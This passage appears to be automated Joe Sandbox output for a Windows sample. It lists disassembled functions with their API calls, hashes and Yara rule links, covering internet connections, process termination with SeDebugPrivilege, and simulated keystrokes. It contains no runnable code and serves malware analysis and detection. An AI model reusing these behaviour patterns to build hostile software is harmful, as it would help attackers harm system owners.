Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: cb3dd148be3a2d1e2d9393882f92fe4bcf8eaffb1fe7f836ede81ef0a58cf22b
Instruction ID: 0e5e920af8b72ea89eb3d96b20863d65e4089beea5e58a1b8eafce7c2a13a083
Opcode Fuzzy Hash: cb3dd148be3a2d1e2d9393882f92fe4bcf8eaffb1fe7f836ede81ef0a58cf22b
Instruction Fuzzy Hash: 7611E3B768870AF9FA156724DC0FDB677DCCB05324F20021AFA09A50D2FEAD68436618

Function 006DCE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 006DCEB7
_free.LIBCMT ref: 006DCF22
_free.LIBCMT ref: 006DCF48
_free.LIBCMT ref: 006DCF71
_free.LIBCMT ref: 006DCFA9
_free.LIBCMT ref: 006DCFDA
_free.LIBCMT ref: 006DD01B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 006DD09C
_free.LIBCMT ref: 006DD0B5

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: 10b15114fff348b7862816be07967d6fb468459281feb4630e3514d2dcf8b1ea
Instruction ID: 4c652a9834890ed6955a9da9e7a706e8e5f392c5ea3da29b377eee0bc58fdc36
Opcode Fuzzy Hash: 10b15114fff348b7862816be07967d6fb468459281feb4630e3514d2dcf8b1ea
Instruction Fuzzy Hash: 726155B1E0430AAFDB31AFB89891AEA7BA7EF05360F04416FF9049B381D6359D01D794

Function 007350D4 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00735186
ShowWindow.USER32(?,00000000), ref: 007351C7
ShowWindow.USER32(?,00000005,?,00000000), ref: 007351CD
SetFocus.USER32(?,?,00000005,?,00000000), ref: 007351D1

Part of subcall function 00736FBA: DeleteObject.GDI32(00000000), ref: 00736FE6

GetWindowLongW.USER32(?,000000F0), ref: 0073520D
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0073521A
InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0073524D
SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00735287
SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00735296

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
String ID:
API String ID: 3210457359-0
Opcode ID: 807356175d1c317a0dfa3ea2f294dbb328e8d8abccb4d1c98db517c2dac6054e
Instruction ID: ba082daa7b8815fec85cbb18ea5d958a72560494d5d0424c1c37df6d6eb97576
Opcode Fuzzy Hash: 807356175d1c317a0dfa3ea2f294dbb328e8d8abccb4d1c98db517c2dac6054e
Instruction Fuzzy Hash: DA519FB0A40A0CFEFF209F28CC4ABD93BA5BB05361F148111FA15962E2C77DA990DB41

Function 006B8B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 006F6890
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 006F68A9
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 006F68B9
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 006F68D1
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 006F68F2
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,006B8874,00000000,00000000,00000000,000000FF,00000000), ref: 006F6901
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 006F691E
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,006B8874,00000000,00000000,00000000,000000FF,00000000), ref: 006F692D

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: 21e0632b76b7af677b7fe89d124d513be1d3380bbe24bf65551fd8cd22cd5a28
Instruction ID: bba1db82c3bd76affe1b14ab5b36dc21a6e1a477601148fccfe895481a6df5c9
Opcode Fuzzy Hash: 21e0632b76b7af677b7fe89d124d513be1d3380bbe24bf65551fd8cd22cd5a28
Instruction Fuzzy Hash: E2517CB0600209EFDB20CF28CC55FEA7BBAFB54750F108518FA56A72A0DB74E991DB54

Function 0071C143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0071C182
GetLastError.KERNEL32 ref: 0071C195
SetEvent.KERNEL32(?), ref: 0071C1A9

Part of subcall function 0071C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0071C272
Part of subcall function 0071C253: GetLastError.KERNEL32 ref: 0071C322
Part of subcall function 0071C253: SetEvent.KERNEL32(?), ref: 0071C336
Part of subcall function 0071C253: InternetCloseHandle.WININET(00000000), ref: 0071C341

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: cfcce74d80790283386f86c1b43ee4b7b5807260ae73d4804deefc63a00fbf28
Instruction ID: c98105f0a032b7c1509cfe44425f76bb7a3aecc378138c9263674867e96ba227
Opcode Fuzzy Hash: cfcce74d80790283386f86c1b43ee4b7b5807260ae73d4804deefc63a00fbf28
Instruction Fuzzy Hash: A131A171280605FFDB229FE9DC08AABBBF8FF18301B04841DF95696650C739E854EB60

Function 007025A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00703A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00703A57
Part of subcall function 00703A3D: GetCurrentThreadId.KERNEL32 ref: 00703A5E
Part of subcall function 00703A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,007025B3), ref: 00703A65

MapVirtualKeyW.USER32(00000025,00000000), ref: 007025BD
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 007025DB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 007025DF
MapVirtualKeyW.USER32(00000025,00000000), ref: 007025E9
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00702601
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00702605
MapVirtualKeyW.USER32(00000025,00000000), ref: 0070260F
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00702623
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00702627

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 2747f31ce07b262d645feec44f8d86326b66ef054f3e1d43f121ece7ee439f5f
Instruction ID: 80e536fd6f987216c85067f47560be7cae3d69f282c02d3d04ab7a66e8591247
Opcode Fuzzy Hash: 2747f31ce07b262d645feec44f8d86326b66ef054f3e1d43f121ece7ee439f5f
Instruction Fuzzy Hash: 0601D471390214FBFB1067689C8FF593F99DB4EB12F104041F318BE1D1C9EA28459A6D

Function 00701803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00701449,?,?,00000000), ref: 0070180C
HeapAlloc.KERNEL32(00000000,?,00701449,?,?,00000000), ref: 00701813
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00701449,?,?,00000000), ref: 00701828
GetCurrentProcess.KERNEL32(?,00000000,?,00701449,?,?,00000000), ref: 00701830
DuplicateHandle.KERNEL32(00000000,?,00701449,?,?,00000000), ref: 00701833
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00701449,?,?,00000000), ref: 00701843
GetCurrentProcess.KERNEL32(00701449,00000000,?,00701449,?,?,00000000), ref: 0070184B
DuplicateHandle.KERNEL32(00000000,?,00701449,?,?,00000000), ref: 0070184E
CreateThread.KERNEL32(00000000,00000000,00701874,00000000,00000000,00000000), ref: 00701868

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 31f612eb8b1474b28fb1fab3494bca63557e7b71dd44d12f4a2cb41eed22cc61
Instruction ID: fd5595887c1c65e50484738cc03c983366734f66792c93b63480ba7debaf8736
Opcode Fuzzy Hash: 31f612eb8b1474b28fb1fab3494bca63557e7b71dd44d12f4a2cb41eed22cc61
Instruction Fuzzy Hash: 1301A8B5240308BFF611ABA5DC4AF6B3BACEB89B11F418411FA05EB1A1CA7498109B24

Function 0072A0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 0070D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0070D501
Part of subcall function 0070D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0070D50F
Part of subcall function 0070D4DC: CloseHandle.KERNEL32(00000000), ref: 0070D5DC

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0072A16D
GetLastError.KERNEL32 ref: 0072A180
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0072A1B3
TerminateProcess.KERNEL32(00000000,00000000), ref: 0072A268
GetLastError.KERNEL32(00000000), ref: 0072A273
CloseHandle.KERNEL32(00000000), ref: 0072A2C4

Strings

SeDebugPrivilege, xrefs: 0072A18F

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 4a2310436393e6ffd0bb8eb55e08dc97d2f6bcd32883f618b4df7fa56964b356
Instruction ID: e7c9d1da8b9dfdc674ac521ec4b0b57778e8cd753dbcbf8bfa8b91acb2d8fc3e
Opcode Fuzzy Hash: 4a2310436393e6ffd0bb8eb55e08dc97d2f6bcd32883f618b4df7fa56964b356
Instruction Fuzzy Hash: 56619D71204252EFD720DF18D894F15BBE1AF84318F18849CE4668B7A3C77AEC45CB96

Function 00733886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00733925
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0073393A
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00733954
_wcslen.LIBCMT ref: 00733999
SendMessageW.USER32(?,00001057,00000000,?), ref: 007339C6
SendMessageW.USER32(?,00001061,?,0000000F), ref: 007339F4

Strings

SysListView32, xrefs: 007338F7

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: SysListView32
API String ID: 2147712094-78025650
Opcode ID: 379a2d54a08924458e048856163053defc2a8d8410610b2bee7024368f8e8c27
Instruction ID: bdb029c2347e80aa6162bfe96e142aaa74afeb96ea40b181d30af296462ac3de
Opcode Fuzzy Hash: 379a2d54a08924458e048856163053defc2a8d8410610b2bee7024368f8e8c27
Instruction Fuzzy Hash: 4541A271A00318EBEB219F64CC49FEA77A9EF08354F10456AF958E7282D7799D80CB94

Function 006C2D20 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 006C2D4B
___except_validate_context_record.LIBVCRUNTIME ref: 006C2D53
_ValidateLocalCookies.LIBCMT ref: 006C2DE1
__IsNonwritableInCurrentImage.LIBCMT ref: 006C2E0C
_ValidateLocalCookies.LIBCMT ref: 006C2E61

Strings

&Hl, xrefs: 006C2DFE, 006C2E07, 006C2E18
csm, xrefs: 006C2DF6

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: &Hl$csm
API String ID: 1170836740-4116197483
Opcode ID: 7a3317b2834f6507b164700657ab0c313f73f2ce6f2bd3ed6dbee2f93cf0141c
Instruction ID: 0d29d31292b4b29cb9f6e7581d01cb0436a767d86ae912dcaf92a35d2315130d
Opcode Fuzzy Hash: 7a3317b2834f6507b164700657ab0c313f73f2ce6f2bd3ed6dbee2f93cf0141c
Instruction Fuzzy Hash: 8F417D34A0121AABCF10DF68C855FEEBBA6FF45324F14815DEC156B392D735AA058BD0

Function 0070C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 0070C913

Strings

question, xrefs: 0070C8CC
blank, xrefs: 0070C895
stop, xrefs: 0070C8E4
warning, xrefs: 0070C8FC
info, xrefs: 0070C8B4

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: a99b4ab2531d7ed9893fed863820c7daf0af2be6086a4a7e6e969445636f30c9
Instruction ID: 5397dc70f6aeb85e6fe6bfdccfcf3bec69056bdb712c17351fd9099dda0895ba
Opcode Fuzzy Hash: a99b4ab2531d7ed9893fed863820c7daf0af2be6086a4a7e6e969445636f30c9
Instruction Fuzzy Hash: 0B113D31699306FEE7069B549C83DAA37DCDF15314B50432EF904A62C2EB7CAD00526C

Function 0070ED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 0070ED2A
_wcslen.LIBCMT ref: 0070ED3B
_wcslen.LIBCMT ref: 0070ED79
_wcslen.LIBCMT ref: 0070EDAF
_wcslen.LIBCMT ref: 0070EDDF
_wcslen.LIBCMT ref: 0070EDEF
_wcslen.LIBCMT ref: 0070EE2B
_wcslen.LIBCMT ref: 0070EE5A

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: b61a9f75af1a684bfbb5d59f464a6e812829a6b16625da331b88d4e9504bc262
Instruction ID: f22307143735fd4b2f16dd9c98649b12660cd00f7627b35eb66948724ecfb1a6
Opcode Fuzzy Hash: b61a9f75af1a684bfbb5d59f464a6e812829a6b16625da331b88d4e9504bc262
Instruction Fuzzy Hash: C641B265D10118A5DB51EBB4C88AEEFB3A9EF05300F00896AF518E3162FB38D345C3E9

Function 006BF8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,006F682C,00000004,00000000,00000000), ref: 006BF953
ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,006F682C,00000004,00000000,00000000), ref: 006FF3D1
ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,006F682C,00000004,00000000,00000000), ref: 006FF454

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: e8f5aa203bc6a2a8a10804c7c3fe70f936736e9c5dc57fed03ee6af826dc8fd7
Instruction ID: a8adc72360d65884a754bca8c39e32ccc1f5614dd7fced4218077cc905cd815a
Opcode Fuzzy Hash: e8f5aa203bc6a2a8a10804c7c3fe70f936736e9c5dc57fed03ee6af826dc8fd7
Instruction Fuzzy Hash: C44127B1208684FAD739AB2C8C887FA7B93AF46310F14843CF18762771C636A8C1CB51

Function 00732D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00732D1B
GetDC.USER32(00000000), ref: 00732D23
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00732D2E
ReleaseDC.USER32(00000000,00000000), ref: 00732D3A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00732D76
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00732D87
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00735A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00732DC2
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00732DE1

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 21e64d54f580702d1a1912796979b2912e3c9ee8f7556491cd1969573bea250e
Instruction ID: 78f5528b231cea22f1daed53db4f97907a23b58769e11783f317945fc296fe3b
Opcode Fuzzy Hash: 21e64d54f580702d1a1912796979b2912e3c9ee8f7556491cd1969573bea250e
Instruction Fuzzy Hash: 81317F72211214BFFB154F50CC8AFEB3BA9EF09715F048055FE48AA292C6799C51C7A4

Function 00705622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00705637
_memcmp.LIBVCRUNTIME ref: 00705659
_memcmp.LIBVCRUNTIME ref: 00705671
_memcmp.LIBVCRUNTIME ref: 00705684
_memcmp.LIBVCRUNTIME ref: 0070569E
_memcmp.LIBVCRUNTIME ref: 007056B1
_memcmp.LIBVCRUNTIME ref: 007056C9
_memcmp.LIBVCRUNTIME ref: 007056E4

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: c4c3895884d6902ef942380dfa778056d4f62e6c0861534c8b480569b1c4c115
Instruction ID: ed8518851f9937a7f8cf0e73158f05d70b28eb6d072aabc40216d14ec0fcbfd0
Opcode Fuzzy Hash: c4c3895884d6902ef942380dfa778056d4f62e6c0861534c8b480569b1c4c115
Instruction Fuzzy Hash: 4421ADA1A40A05F7E31455218E52FBB33DDEF22784F440128FD099E5C2FB69DD108DB9

Function 00724FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 0072502E, 00725383
Not an Object type, xrefs: 00725007

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: f235b1d555afbe387493f9bb6d9815f7d4b3a2aed0ed372a11a76db2bb026fda
Instruction ID: be65074d9d011d5332834c9a3381afebb6b6310c2413ef7623a9d95b09fbb76b
Opcode Fuzzy Hash: f235b1d555afbe387493f9bb6d9815f7d4b3a2aed0ed372a11a76db2bb026fda
Instruction Fuzzy Hash: 2ED1C1B1A0061ADFDF10CFA8D885BAEB7B5FF48354F148069E915AB281E774DD41CBA0

Function 006E1522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,006E17FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 006E15CE
